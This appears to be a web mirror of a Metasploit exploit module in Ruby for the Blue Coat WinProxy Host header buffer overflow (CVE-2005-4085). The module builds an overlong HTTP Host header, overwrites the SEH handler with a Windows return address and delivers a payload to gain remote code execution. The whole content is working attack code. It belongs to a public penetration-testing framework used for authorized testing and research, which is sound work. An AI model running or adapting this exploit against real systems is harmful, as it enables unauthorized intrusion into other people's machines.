CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] }

10


11
  include Msf::Exploit::Remote::Tcp

12
  include Msf::Exploit::Remote::Seh

13


14
  def initialize(info = {})

15
    super(update_info(info,

16
      'Name'           => 'Blue Coat WinProxy Host Header Overflow',

17
      'Description'    => %q{

18
          This module exploits a buffer overflow in the Blue Coat Systems WinProxy

19
        service by sending a long port value for the Host header in a HTTP

20
        request.

21
      },

22
      'Author'         => 'MC',

23
      'License'        => MSF_LICENSE,

24
      'References'     =>

25
        [

26
          ['CVE', '2005-4085'],

27
          ['OSVDB', '22238'],

28
          ['BID', '16147'],

29
          ['URL', 'http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html'],

30
        ],

31
      'DefaultOptions' =>

32
        {

33
          'EXITFUNC' => 'thread',

34
        },

35
      'Payload'        =>

36
        {

37
          'Space'    => 600,

38
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",

39
          'StackAdjustment' => -3500,

40
        },

41
      'Platform'       => 'win',

42
      'Targets'        =>

43
        [

44
          [ 'WinProxy <= 6.1 R1a Universal', { 'Ret' => 0x6020ba04 } ], # Asmdat.dll

45
        ],

46
      'Privileged'     => true,

47
      'DisclosureDate' => '2005-01-05',

48
      'DefaultTarget' => 0))

49


50
    register_options(

51
      [

52
        Opt::RPORT(80)

53
      ])

54


55
  end

56


57
  def exploit

58
    connect

59


60
    print_status("Trying target #{target.name}...")

61


62
    sploit  = "GET / HTTP/1.1" + "\r\n"

63
    sploit += "Host: 127.0.0.1:"

64
    sploit += rand_text_english(31, payload_badchars)

65
    seh  = generate_seh_payload(target.ret)

66
    sploit[23, seh.length] = seh

67
    sploit += "\r\n\r\n"

68


69
    sock.put(sploit)

70
    sock.get_once(-1, 3)

71


72
    handler

73
    disconnect

74
  end

75
end

76


77